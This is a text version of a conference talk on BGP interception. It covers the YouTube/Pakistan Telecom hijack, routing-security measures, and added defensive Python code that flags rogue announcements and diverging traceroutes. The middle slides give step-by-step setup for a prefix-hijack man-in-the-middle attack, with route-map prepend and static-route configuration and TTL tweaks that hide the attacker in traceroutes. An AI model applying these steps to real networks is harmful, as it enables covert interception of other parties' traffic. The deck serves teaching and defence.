8/13/2019 Border Gateway Protocol Interception
02/08 YouTube Hijack Saga
• YouTube announces 5 prefixes:
  – A /19, /20, /22, and two /2?s
  – The /22 is 208.65.152.0/22
• Pakistan's government decides to block YouTube. Pakistan Telecom internally nails up a more specific route (208.65.153.0/24) out of YouTube's /22 to null0 (the routers' discard interface). Somehow redists from static to bgp, then to PCCW. Upstream provider sends routes to everyone else!
• Most of the net now goes to Pakistan for YouTube, gets nothing.
• YouTube responds by announcing both the /22 and two more specific /24s, with partial success.
• PCCW turns off Pakistan Telecom peering two hours later. 2 to 4 minutes afterward, global bgp table is clean again.
Pakistan Govt Notice
Of Interest: IP Hijacking BoF
• Un-official event at NANOG conference
• We test security of Internet routing infrastructure
• Recent exercises:
  – Hijacked 1.0.0.0/8: 90% success
  – Hijacked 1.6.0.0/16: 94% success
  – Attempted to announce networks longer than /24, from /25 down to /32, with cooperation of large CDNs: 0% successful overall
Routing Security Is Complicated
• No answer yet, due to lack of chain of trust from ICANN on down
• "Weakest link" problem: Until everyone filters everyone perfectly, this door is still open. Best practice today is "Alerting" systems that look for rogue announcements (PHAS, RIPE MyASN, Renesys, etc)
• Register your AS and your prefix in RIR (no immediate effect, but eventually someone will use them)
• No anonymity – if you hijack, everyone knows it's you (due to AS-PATH)
• If things still work, who complains?
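As an added example (not code from the deck or its authors), the following Python models the three checks an "alerting" system of the kind named above can run over observed announcements, and the same predicate can drive the customer-facing ingress filter the closing slide asks for. It uses the deck's ASN 100 / ASN 200 / 10.10.220.0/24 scenario; the registry, the baseline paths, the feed and the rogue origin AS999 are all constructed for this example, as are the helper names. Besides the origin and prefix-length checks that would have caught the Pakistan Telecom /24, it keeps a set of directed AS adjacencies from a quiet baseline, which is what still exposes the prepend-based MITM path from the later slides: origin and length look fine, but AS100 turns up in a transit position it has never held.

```python
"""Added example (not part of the original deck): three alerting checks a
prefix holder or transit provider can run over observed BGP announcements.
All registrations, baseline paths and feed entries are constructed; AS10/20/
30/40/60/100/200 follow the deck's scenario and AS999 is a made-up rogue origin."""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Registration:
    prefix: ipaddress.IPv4Network  # registered (RIR / IRR / ROA-style) prefix
    origin_as: int                 # AS allowed to originate it
    max_length: int                # longest prefix the holder will ever announce


@dataclass(frozen=True)
class Announcement:
    prefix: ipaddress.IPv4Network
    as_path: tuple[int, ...]       # leftmost = observer's neighbour, rightmost = origin


# Constructed registry: AS200 holds 10.10.220.0/24 and never announces anything longer.
REGISTRY = [Registration(ipaddress.ip_network("10.10.220.0/24"), 200, 24)]

# Constructed baseline: AS paths seen during a quiet period. AS100 only ever
# appears as an origin (a stub customer of AS10 and AS40), never as transit.
BASELINE_PATHS = [
    (60, 30, 20, 200),   # observer at AS60 reaches the target via AS30 / AS20
    (10, 20, 200),       # observer at AS10's edge reaches the target via AS20
    (60, 40, 100),       # AS100's own prefixes, seen through AS40 ...
    (10, 100),           # ... and through AS10
]


def directed_edges(paths):
    """Set of (receiver, sender) AS pairs seen in baseline paths."""
    edges = set()
    for path in paths:
        for a, b in zip(path, path[1:]):
            if a != b:           # ignore an AS prepending itself
                edges.add((a, b))
    return edges


BASELINE_EDGES = directed_edges(BASELINE_PATHS)


def covering_registration(prefix, registry):
    """The registration whose prefix covers `prefix`, or None if unregistered."""
    return next((r for r in registry if prefix.subnet_of(r.prefix)), None)


def check_announcement(ann, registry, baseline_edges):
    """Return a list of findings; an empty list means the announcement looks legitimate."""
    findings = []
    reg = covering_registration(ann.prefix, registry)
    if reg is None:
        return [f"{ann.prefix}: no registration covers this prefix"]
    origin = ann.as_path[-1]
    if origin != reg.origin_as:
        findings.append(f"{ann.prefix}: origin AS{origin} differs from registered AS{reg.origin_as}")
    if ann.prefix.prefixlen > reg.max_length:
        findings.append(f"{ann.prefix}: /{ann.prefix.prefixlen} is more specific than the allowed /{reg.max_length}")
    for a, b in zip(ann.as_path, ann.as_path[1:]):
        if a != b and (a, b) not in baseline_edges:
            findings.append(f"{ann.prefix}: AS{a} has never been seen receiving routes from AS{b}")
    return findings


# Constructed feed, as an observer at AS60 might see it.
SAMPLE_FEED = [
    Announcement(ipaddress.ip_network("10.10.220.0/24"), (60, 30, 20, 200)),            # legitimate
    Announcement(ipaddress.ip_network("10.10.220.0/24"), (60, 30, 999)),                # wrong origin
    Announcement(ipaddress.ip_network("10.10.220.128/25"), (60, 30, 20, 200)),          # more specific, Pakistan Telecom style
    Announcement(ipaddress.ip_network("10.10.220.0/24"), (60, 40, 100, 10, 20, 200)),   # prepend-based MITM path
]


def audit(feed=SAMPLE_FEED):
    """Findings for each announcement in the feed, in order."""
    return [check_announcement(a, REGISTRY, BASELINE_EDGES) for a in feed]


if __name__ == "__main__":
    for ann, findings in zip(SAMPLE_FEED, audit()):
        print(ann.prefix, list(ann.as_path), findings or "OK")
```

Note that a pure origin/ROA check passes the fourth announcement, because the prepended path ends in the real origin AS200; only the adjacency history (AS100 has never provided transit to AS10) flags it, which is the "no anonymity" point of the slide.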
How To Resolve A Hijacking
• Once rogue announcement is identified, work begins. Contact the upstreams and scream
  – May take minutes, hours (if you are YouTube-sized), or possibly days
• About as easy as getting DDoS stopped (or not)
What This Means
• Rootkits → 0day rogue announcements. Man-in-middle attacks, with our clues applied
  – No need for three-way-handshake when you're in-line
  – Nearly invisible exploitation potential, globally
• Endpoint enumeration – direct discovery of who and what your network talks to
• Can be accomplished globally, any-to-any
• How would you know if this isn't happening right now to your traffic at DEFCON?
BGP MITM Hijack Concept
• We originate the route like we always did
  – Win through usual means (prefix length, shorter as-path w/ several origin points, etc). "Win" is some definition of "most of the internet chooses our route"
• We return the packets somehow
  – Coordinating delivery was non-trivial
  – Vpn/tunnel involve untenable coordination at target. Then it clicked – use the Internet itself as reply path, but how?
BGP MITM Setup
1. Traceroute & plan reply path to target. Note the ASN's seen towards target from traceroute & bgp table on your router
2. Apply as-path prepends naming each of the ASN's intended for reply path
3. Nail up static routes towards the next-hop of the first AS in reply path
4. Done
BGP MITM – First Observe
[Diagram: Random User ASN 100 and Target ASN 200 connected through six transit ASes, among them AS10 and AS60]
ASN 200 originates 10.10.220.0/24, sends announcements to two of its neighbouring ASes
Internet is converged towards valid route
View of Forwarding Information Base (FIB) for 10.10.220.0/24 after converging
BGP MITM – Plan reply path
[Diagram: the same topology, with ASN 100 now labelled Attacker]
ASN 100's FIB shows route for 10.10.220.0/24 via AS10
We then build our as-path prepend list to include AS 10, 20, and 200
BGP MITM – Setup Routes
[Diagram: the same topology]
10.10.220.0/24 is announced with a route-map:
route-map hijacked permit 10
 match ip address prefix-list jacked
 set as-path prepend 10 20 200
Then, install static route in AS100 for 10.10.220.0/24 to AS10's link:
ip route 10.10.220.0 255.255.255.0 4.3.2.1
Anonymizing The Hijacker
• We adjust TTL of packets in transit
• Effectively
Without TTL adjustment
2 12.87.94.9 [AS 7018] 4 msec 4 msec 8 msec
3 tbr1.cgcil.ip.att.net [12.122.99.38] [AS 7018] 4 msec 8 msec 4 msec
4 ggr2.cgcil.ip.att.net [12.123.6.29] [AS 7018] 8 msec 4 msec 8 msec
5 192.205.35.42 [AS 7018] 4 msec 8 msec 4 msec
6 cr2-loopback.chd.savvis.net [208.172.2.71] [AS 3561] 24 msec 16 msec 28 msec
7 cr2-pos-0-0-5-0.NewYork.savvis.net [204.70.192.110] [AS 3561] 28 msec 28 msec 28 msec
8 204.70.196.70 [AS 3561] 28 msec 32 msec 32 msec
9 208.175.194.10 [AS 3561] 28 msec 32 msec 32 msec
10 colo-69-31-40-107.pilosoft.com [69.31.40.107] [AS 26627] 32 msec 28 msec 28 msec
11 tge2-3-103.ar1.nyc3.us.nlayer.net [69.31.95.97] [AS 4436] 32 msec 32 msec 32 msec
12 [missing from trace: 198.32.160.134 exchange point]
13 tge1-2.fr4.ord.llnw.net [69.28.171.193] [AS 22822] 32 msec 32 msec 40 msec
14 ve6.fr3.ord.llnw.net [69.28.172.41] [AS 22822] 36 msec 32 msec 40 msec
15 tge1-3.fr4.sjc.llnw.net [69.28.171.66] [AS 22822] 84 msec 84 msec 84 msec
16 ve5.fr3.sjc.llnw.net [69.28.171.209] [AS 22822] 96 msec 96 msec 80 msec
17 tge1-1.fr4.lax.llnw.net [69.28.171.117] [AS 22822] 88 msec 92 msec 92 msec
18 tge2-4.fr3.las.llnw.net [69.28.172.85] [AS 22822] 96 msec 96 msec 100 msec
19 switch.ge3-1.fr3.las.llnw.net [208.111.176.2] [AS 22822] 84 msec 88 msec 88 msec
20 gig5-1.esw03.las.switchcommgroup.com [66.209.64.186] [AS 23005] 84 msec 88 msec 88 msec
21 66.209.64.85 [AS 23005] 88 msec 88 msec 88 msec
22 gig0-2.esw07.las.switchcommgroup.com [66.209.64.178] [AS 23005] 88 msec 88 msec 88 msec
23 acs-wireless.demarc.switchcommgroup.com [66.209.64.70] [AS 23005] 88 msec 84 msec 84 msec
With TTL Adjustments
2 12.87.94.9 [AS 7018] 8 msec 8 msec 4 msec
3 tbr1.cgcil.ip.att.net [12.122.99.38] [AS 7018] 4 msec 8 msec 8 msec
4 ggr2.cgcil.ip.att.net [12.123.6.29] [AS 7018] 4 msec 8 msec 4 msec
5 192.205.35.42 [AS 7018] 8 msec 4 msec 8 msec
6 cr2-loopback.chd.savvis.net [208.172.2.71] [AS 3561] 16 msec 12 msec
7 cr2-pos-0-0-5-0.NewYork.savvis.net [204.70.192.110] [AS 3561] 28 msec 32 msec 32 msec
8 204.70.196.70 [AS 3561] 28 msec 32 msec 32 msec
9 208.175.194.10 [AS 3561] 32 msec 32 msec 32 msec
10 gig5-1.esw03.las.switchcommgroup.com [66.209.64.186] [AS 23005] 88 msec 88 msec 84 msec
11 66.209.64.85 [AS 23005] 88 msec 88 msec 88 msec
12 gig0-2.esw07.las.switchcommgroup.com [66.209.64.178] [AS 23005] 84 msec 84 msec 88 msec
13 acs-wireless.demarc.switchcommgroup.com [66.209.64.70] [AS 23005] 88 msec 88 msec 88 msec
Compare Original BGP & Route Path
Hijacked
2 12.87.94.9 [AS 7018] 8 msec 8 msec 4 msec
3 tbr1.cgcil.ip.att.net [12.122.99.38] [AS 7018] 4 msec 8 msec 8 msec
4 ggr2.cgcil.ip.att.net [12.123.6.29] [AS 7018] 4 msec 8 msec 4 msec
5 192.205.35.42 [AS 7018] 8 msec 4 msec 8 msec
6 cr2-loopback.chd.savvis.net [208.172.2.71] [AS 3561] 16 msec 12 msec
7 cr2-pos-0-0-5-0.NewYork.savvis.net [204.70.192.110] [AS 3561] 28 msec 32 msec 32 msec
8 204.70.196.70 [AS 3561] 28 msec 32 msec 32 msec
9 208.175.194.10 [AS 3561] 32 msec 32 msec 32 msec
10 gig5-1.esw03.las.switchcommgroup.com [66.209.64.186] [AS 23005] 88 msec 88 msec 84 msec
11 66.209.64.85 [AS 23005] 88 msec 88 msec 88 msec
12 gig0-2.esw07.las.switchcommgroup.com [66.209.64.178] [AS 23005] 84 msec 84 msec 88 msec
13 acs-wireless.demarc.switchcommgroup.com [66.209.64.70] [AS 23005] 88 msec 88 msec 88 msec
Original
2 12.87.94.9 [AS 7018] 8 msec 8 msec 4 msec
3 tbr1.cgcil.ip.att.net [12.122.99.38] [AS 7018] 8 msec 8 msec 8 msec
4 12.122.99.17 [AS 7018] 8 msec 4 msec 8 msec
5 12.86.156.10 [AS 7018] 12 msec 8 msec 4 msec
6 tge1-3.fr4.sjc.llnw.net [69.28.171.66] [AS 22822] 68 msec 56 msec 68 msec
7 ve5.fr3.sjc.llnw.net [69.28.171.209] [AS 22822] 56 msec 68 msec 56 msec
8 tge1-1.fr4.lax.llnw.net [69.28.171.117] [AS 22822] 64 msec 64 msec 72 msec
9 tge2-4.fr3.las.llnw.net [69.28.172.85] [AS 22822] 68 msec 72 msec 72 msec
10 switch.ge3-1.fr3.las.llnw.net [208.111.176.2] [AS 22822] 60 msec 60 msec 60 msec
11 gig5-1.esw03.las.switchcommgroup.com [66.209.64.186] [AS 23005] 60 msec 60 msec 60 msec
12 66.209.64.85 [AS 23005] 64 msec 60 msec 60 msec
13 gig0-2.esw07.las.switchcommgroup.com [66.209.64.178] [AS 23005] 60 msec 64 msec 60 msec
14 acs-wireless.demarc.switchcommgroup.com [66.209.64.70] [AS 23005] 60 msec 60 msec 60 msec
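As an added example (not the deck's own tooling), here is a Python parser for the traceroute format printed on the TTL-adjustment and comparison slides, which reduces each trace to its AS-level path and reports where the observed path leaves the baseline and how far the end-to-end latency moved. The hop lines are abridged from the "Original" and "Hijacked" traces above, keeping their hop numbers; the helper names are this example's own. It handles the two quirks visible in the slides: a hop printed as a bare address with no [ip] field, and a hop that reports fewer than three probes.

```python
"""Added example (not part of the original deck): parse two traceroutes in the
format shown on these slides and report where the AS-level path diverges and
how much the end-to-end latency moved. Hop lines are abridged from the deck's
'Original' and 'Hijacked' traces; function and variable names are this example's own."""
from __future__ import annotations

import re
import statistics
from dataclasses import dataclass

# "<hop> <host> [<ip>] [AS <asn>] <rtt> msec ..."; the [ip] part is absent when
# the hop is printed as a bare address instead of a resolved name.
HOP_RE = re.compile(r"^\s*(\d+)\s+(\S+)(?:\s+\[([\d.]+)\])?\s+\[AS\s*(\d+)\]\s*(.*)$")
RTT_RE = re.compile(r"(\d+)\s*msec")


@dataclass(frozen=True)
class Hop:
    number: int
    host: str
    ip: str | None
    asn: int
    rtts: tuple[int, ...]


ORIGINAL_TRACE = """
2 12.87.94.9 [AS 7018] 8 msec 8 msec 4 msec
3 tbr1.cgcil.ip.att.net [12.122.99.38] [AS 7018] 8 msec 8 msec 8 msec
6 tge1-3.fr4.sjc.llnw.net [69.28.171.66] [AS 22822] 68 msec 56 msec 68 msec
10 switch.ge3-1.fr3.las.llnw.net [208.111.176.2] [AS 22822] 60 msec 60 msec 60 msec
11 gig5-1.esw03.las.switchcommgroup.com [66.209.64.186] [AS 23005] 60 msec 60 msec 60 msec
14 acs-wireless.demarc.switchcommgroup.com [66.209.64.70] [AS 23005] 60 msec 60 msec 60 msec
"""

OBSERVED_TRACE = """
2 12.87.94.9 [AS 7018] 8 msec 8 msec 4 msec
3 tbr1.cgcil.ip.att.net [12.122.99.38] [AS 7018] 4 msec 8 msec 8 msec
6 cr2-loopback.chd.savvis.net [208.172.2.71] [AS 3561] 16 msec 12 msec
9 208.175.194.10 [AS 3561] 32 msec 32 msec 32 msec
10 gig5-1.esw03.las.switchcommgroup.com [66.209.64.186] [AS 23005] 88 msec 88 msec 84 msec
13 acs-wireless.demarc.switchcommgroup.com [66.209.64.70] [AS 23005] 88 msec 88 msec 88 msec
"""


def parse_trace(text):
    """Parse hop lines; lines that do not look like a hop (annotations, blanks) are skipped."""
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue
        num, host, ip, asn, rest = m.groups()
        rtts = tuple(int(v) for v in RTT_RE.findall(rest))  # a hop may report fewer than 3 probes
        hops.append(Hop(int(num), host, ip, int(asn), rtts))
    return hops


def as_sequence(hops):
    """Collapse consecutive hops inside the same AS into one AS-level path."""
    seq = []
    for h in hops:
        if not seq or seq[-1] != h.asn:
            seq.append(h.asn)
    return seq


def compare_traces(original, observed):
    """Diff the AS-level paths and the last-hop latency of a baseline trace and a new one."""
    orig_seq, obs_seq = as_sequence(original), as_sequence(observed)
    diverge = next((i for i, (a, b) in enumerate(zip(orig_seq, obs_seq)) if a != b), None)
    if diverge is None and len(orig_seq) != len(obs_seq):
        diverge = min(len(orig_seq), len(obs_seq))   # one path is a prefix of the other
    return {
        "original_as_sequence": orig_seq,
        "observed_as_sequence": obs_seq,
        "diverges_at_as_index": diverge,
        "unexpected_ases": sorted(set(obs_seq) - set(orig_seq)),
        "missing_ases": sorted(set(orig_seq) - set(obs_seq)),
        # end-to-end latency shift, using the last hop's median RTT
        "last_hop_rtt_delta_ms": statistics.median(observed[-1].rtts) - statistics.median(original[-1].rtts),
    }


def analyse_sample():
    return compare_traces(parse_trace(ORIGINAL_TRACE), parse_trace(OBSERVED_TRACE))


if __name__ == "__main__":
    for key, value in analyse_sample().items():
        print(f"{key}: {value}")
```

On the slides' data the unadjusted trace exposes the extra hops outright, and the TTL-adjusted trace hides them; but the AS sequence still runs AT&T, Savvis, SwitchCommGroup instead of AT&T, Limelight, SwitchCommGroup, and the last hop sits roughly 28 ms further away. Keeping baseline traces to important destinations and alerting on AS-level divergence or a latency step is therefore a practical check even when hop counts look normal.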
In conclusion
• We learned that an arbitrary prefix can be hijacked, without breaking end-to-end
• We saw it can happen nearly invisibly
• We noted the BGP as-path does reveal the attacker
• Shields up: filter your customers
Thanks & Praise
• Felix Lindner
• Jay Beale
• Dan Kaminsky
• Defcon Speaker Goons & Staff
• Todd Underwood